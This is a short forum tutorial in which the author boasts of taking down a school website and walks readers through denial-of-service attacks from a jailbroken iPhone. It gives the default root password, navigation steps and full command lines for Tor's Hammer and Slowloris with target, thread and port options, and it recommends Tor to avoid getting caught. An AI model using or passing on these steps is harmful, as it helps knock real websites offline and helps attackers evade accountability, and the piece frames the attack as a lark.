In this tutorial i'm going to teach you how i took down my school's wevsite in under 2 mins. so you can learn how. This can be applied to all sires but don't do anything stupud.

This was requested by itouch_hacker so there you go, now let's begin!
before...
What you need1. An idevice (duh!)
2. Mobile terminal (found on cydia)
3. Tor (not necessary but recommended if you don't want to get caught)
4. Tors hammer
5. Slowloris
6. A brain (not needed but recommended
StepsFor Tors hammer:
1. Open mobile terminal
2. Log into root
supassword (default is alpine)3. Navigate to the correct directory
cd /var/mobile/pentest/exploits/torshammeror wherever you need to go.
4.Now to use it.
./torshammer.py -t <target> [-r <threads> -p <port> -T -h]
-t = target (hostname, ip)
-r = threads <number of threads> (default to 256)
-p = port <webserver port> (defaults to 80)
-T = Tor enable anonymizing through tor on 127.0.0.1
-h = help

For Slowloris:
1. Open mobile terminal
2. Log into root (instructions above)
3. Type
slowloris 4. then type the following...
perl /usr/local/bin/slowloris -dns [www.examplewebsite.com] (also works with ip's) -options

5.then every 60 seconds it will work it's magic! (mines 10 because i changed it haha)

i recommend using both (i have to, otherwise it takes forever)
and here's the result...

this usually only works for apache.
i hope you enjoyed this tutorial and don't forget to clickity clack that +1 button!
